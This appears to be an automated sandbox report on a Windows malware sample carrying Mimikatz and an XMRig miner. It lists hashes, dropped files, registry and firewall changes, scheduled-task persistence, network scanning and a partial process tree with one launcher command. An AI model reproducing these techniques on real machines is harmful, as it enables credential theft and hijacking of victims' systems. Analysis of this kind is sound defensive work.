Analysis
-
max time kernel
28s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-11-2024 05:43
Behavioral task
behavioral1
Sample
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe
-
Size
9.6MB
-
MD5
4f6395c143f2ae7543bdd3cd6cc66032
-
SHA1
9d76766641358d07089e71eaeb325847be5ed40f
-
SHA256
fca786cffbaf00b178434d17f273421a94a7d8c8173c97c7bbecfb729c57892f
-
SHA512
2b2f083954aa9b695eef767a104f86cc246ca10c7f81646520d42ad7760703a59dc2ac8b896c7f35dc84e71fea9259b3b22f6712022300e88d3cc18604cf471e
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Xmrig family
-
Contacts a large (15750) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/720-181-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-186-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-206-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-215-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-224-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-235-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-249-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-255-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-264-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-373-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig behavioral2/memory/720-374-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2864-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2864-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023ca9-6.dat mimikatz behavioral2/memory/1608-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2532-138-0x00007FF60D550000-0x00007FF60D63E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
Processes:
bmesabc.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bmesabc.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 3752 netsh.exe 2236 netsh.exe -
Executes dropped EXE 5 IoCs
Processes:
bmesabc.exebmesabc.exewpcap.exevrguwycnn.exevfshost.exepid Process 1608 bmesabc.exe 456 bmesabc.exe 640 wpcap.exe 2624 vrguwycnn.exe 2532 vfshost.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exevrguwycnn.exepid Process 640 wpcap.exe 640 wpcap.exe 640 wpcap.exe 640 wpcap.exe 640 wpcap.exe 640 wpcap.exe 640 wpcap.exe 640 wpcap.exe 640 wpcap.exe 2624 vrguwycnn.exe 2624 vrguwycnn.exe 2624 vrguwycnn.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 78 ifconfig.me 77 ifconfig.me -
Drops file in System32 directory 5 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe -
Processes:
resource yara_rule behavioral2/memory/2532-135-0x00007FF60D550000-0x00007FF60D63E000-memory.dmp upx behavioral2/memory/2532-138-0x00007FF60D550000-0x00007FF60D63E000-memory.dmp upx behavioral2/files/0x0007000000023cf9-136.dat upx behavioral2/files/0x0007000000023d03-158.dat upx behavioral2/memory/3988-157-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/3988-160-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-164-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/files/0x0007000000023d01-165.dat upx behavioral2/memory/1600-174-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/3396-178-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-181-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/1552-183-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-186-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/1592-188-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/1708-192-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/1916-196-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/1996-200-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/4376-204-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-206-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/5016-209-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/4676-213-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-215-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/3792-218-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/3012-222-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-224-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/4484-227-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/4972-230-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/3268-232-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/2472-234-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-235-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/372-237-0x00007FF6C7370000-0x00007FF6C73CB000-memory.dmp upx behavioral2/memory/720-249-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/720-255-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/720-264-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/720-373-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/720-374-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx behavioral2/memory/720-377-0x00007FF6D93F0000-0x00007FF6D9510000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 57 IoCs
Processes:
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exebmesabc.execmd.exedescription ioc Process File created C:\Windows\bisbgtln\bmesabc.exe 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\spoolsrv.xml bmesabc.exe File created C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\bmesabc.exe 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\vfshost.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\posh-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\xdvl-0.dll bmesabc.exe File created C:\Windows\bisbgtln\svschost.xml bmesabc.exe File created C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\lkinngyeb.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trfo-2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.xml bmesabc.exe File created C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\exma-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\crli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libeay32.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ssleay32.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tucl-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libxml2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.exe bmesabc.exe File opened for modification C:\Windows\bisbgtln\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\schoedcl.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\tqgibwews\upbdrjv\swrpwe.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\coli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\zlib1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.xml bmesabc.exe File created C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File created C:\Windows\ime\bmesabc.exe bmesabc.exe File opened for modification C:\Windows\tqgibwews\Corporate\log.txt cmd.exe File created C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\cnli-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.exe bmesabc.exe File opened for modification C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimilib.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tibe-2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trch-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ucl.dll bmesabc.exe File opened for modification C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimidrv.sys bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture64.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture32.dll bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe bmesabc.exe File opened for modification C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\Shellcode.ini bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.exe bmesabc.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 876 sc.exe 4812 sc.exe 628 sc.exe 888 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
schtasks.execmd.exenet.exenet.exenet.execmd.exenet.exenet1.execmd.execacls.execmd.execacls.exenet.exeschtasks.exebmesabc.execmd.execmd.exenetsh.exenet1.exenet1.execmd.exevrguwycnn.execmd.execmd.exenetsh.exewpcap.execmd.exenet.exenet1.execmd.exe2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exePING.EXEcacls.execmd.execmd.exenet1.execmd.execmd.execmd.exeschtasks.exebmesabc.exenetsh.exenetsh.exenet1.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmesabc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vrguwycnn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmesabc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 4516 cmd.exe 1692 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0007000000023ca9-6.dat nsis_installer_2 behavioral2/files/0x0011000000023cbd-14.dat nsis_installer_1 behavioral2/files/0x0011000000023cbd-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 5 IoCs
Processes:
bmesabc.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bmesabc.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3296 schtasks.exe 2244 schtasks.exe 5068 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bmesabc.exepid Process 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exepid Process 2864 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exebmesabc.exebmesabc.exedescription pid Process Token: SeDebugPrivilege 2864 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1608 bmesabc.exe Token: SeDebugPrivilege 456 bmesabc.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exebmesabc.exebmesabc.exepid Process 2864 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe 2864 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe 1608 bmesabc.exe 1608 bmesabc.exe 456 bmesabc.exe 456 bmesabc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.execmd.exebmesabc.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 2864 wrote to memory of 4516 2864 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe 84 PID 2864 wrote to memory of 4516 2864 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe 84 PID 2864 wrote to memory of 4516 2864 2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe 84 PID 4516 wrote to memory of 1692 4516 cmd.exe 86 PID 4516 wrote to memory of 1692 4516 cmd.exe 86 PID 4516 wrote to memory of 1692 4516 cmd.exe 86 PID 4516 wrote to memory of 1608 4516 cmd.exe 95 PID 4516 wrote to memory of 1608 4516 cmd.exe 95 PID 4516 wrote to memory of 1608 4516 cmd.exe 95 PID 456 wrote to memory of 676 456 bmesabc.exe 97 PID 456 wrote to memory of 676 456 bmesabc.exe 97 PID 456 wrote to memory of 676 456 bmesabc.exe 97 PID 676 wrote to memory of 3772 676 cmd.exe 99 PID 676 wrote to memory of 3772 676 cmd.exe 99 PID 676 wrote to memory of 3772 676 cmd.exe 99 PID 676 wrote to memory of 5012 676 cmd.exe 100 PID 676 wrote to memory of 5012 676 cmd.exe 100 PID 676 wrote to memory of 5012 676 cmd.exe 100 PID 676 wrote to memory of 3276 676 cmd.exe 101 PID 676 wrote to memory of 3276 676 cmd.exe 101 PID 676 wrote to memory of 3276 676 cmd.exe 101 PID 676 wrote to memory of 4440 676 cmd.exe 102 PID 676 wrote to memory of 4440 676 cmd.exe 102 PID 676 wrote to memory of 4440 676 cmd.exe 102 PID 676 wrote to memory of 3164 676 cmd.exe 103 PID 676 wrote to memory of 3164 676 cmd.exe 103 PID 676 wrote to memory of 3164 676 cmd.exe 103 PID 676 wrote to memory of 1672 676 cmd.exe 104 PID 676 wrote to memory of 1672 676 cmd.exe 104 PID 676 wrote to memory of 1672 676 cmd.exe 104 PID 456 wrote to memory of 1832 456 bmesabc.exe 106 PID 456 wrote to memory of 1832 456 bmesabc.exe 106 PID 456 wrote to memory of 1832 456 bmesabc.exe 106 PID 456 wrote to memory of 4272 456 bmesabc.exe 108 PID 456 wrote to memory of 4272 456 bmesabc.exe 108 PID 456 wrote to memory of 4272 456 bmesabc.exe 108 PID 456 wrote to memory of 1412 456 bmesabc.exe 110 PID 456 wrote to memory of 1412 456 bmesabc.exe 110 PID 456 wrote to memory of 1412 456 bmesabc.exe 110 PID 456 wrote to memory of 3976 456 bmesabc.exe 114 PID 456 wrote to memory of 3976 456 bmesabc.exe 114 PID 456 wrote to memory of 3976 456 bmesabc.exe 114 PID 3976 wrote to memory of 640 3976 cmd.exe 116 PID 3976 wrote to memory of 640 3976 cmd.exe 116 PID 3976 wrote to memory of 640 3976 cmd.exe 116 PID 640 wrote to memory of 5068 640 wpcap.exe 117 PID 640 wrote to memory of 5068 640 wpcap.exe 117 PID 640 wrote to memory of 5068 640 wpcap.exe 117 PID 5068 wrote to memory of 2864 5068 net.exe 119 PID 5068 wrote to memory of 2864 5068 net.exe 119 PID 5068 wrote to memory of 2864 5068 net.exe 119 PID 640 wrote to memory of 2236 640 wpcap.exe 120 PID 640 wrote to memory of 2236 640 wpcap.exe 120 PID 640 wrote to memory of 2236 640 wpcap.exe 120 PID 2236 wrote to memory of 5024 2236 net.exe 122 PID 2236 wrote to memory of 5024 2236 net.exe 122 PID 2236 wrote to memory of 5024 2236 net.exe 122 PID 640 wrote to memory of 1188 640 wpcap.exe 123 PID 640 wrote to memory of 1188 640 wpcap.exe 123 PID 640 wrote to memory of 1188 640 wpcap.exe 123 PID 1188 wrote to memory of 4556 1188 net.exe 125 PID 1188 wrote to memory of 4556 1188 net.exe 125 PID 1188 wrote to memory of 4556 1188 net.exe 125 PID 640 wrote to memory of 4552 640 wpcap.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-01_4f6395c143f2ae7543bdd3cd6cc66032_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bisbgtln\bmesabc.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1692
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1608
-
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:456 -
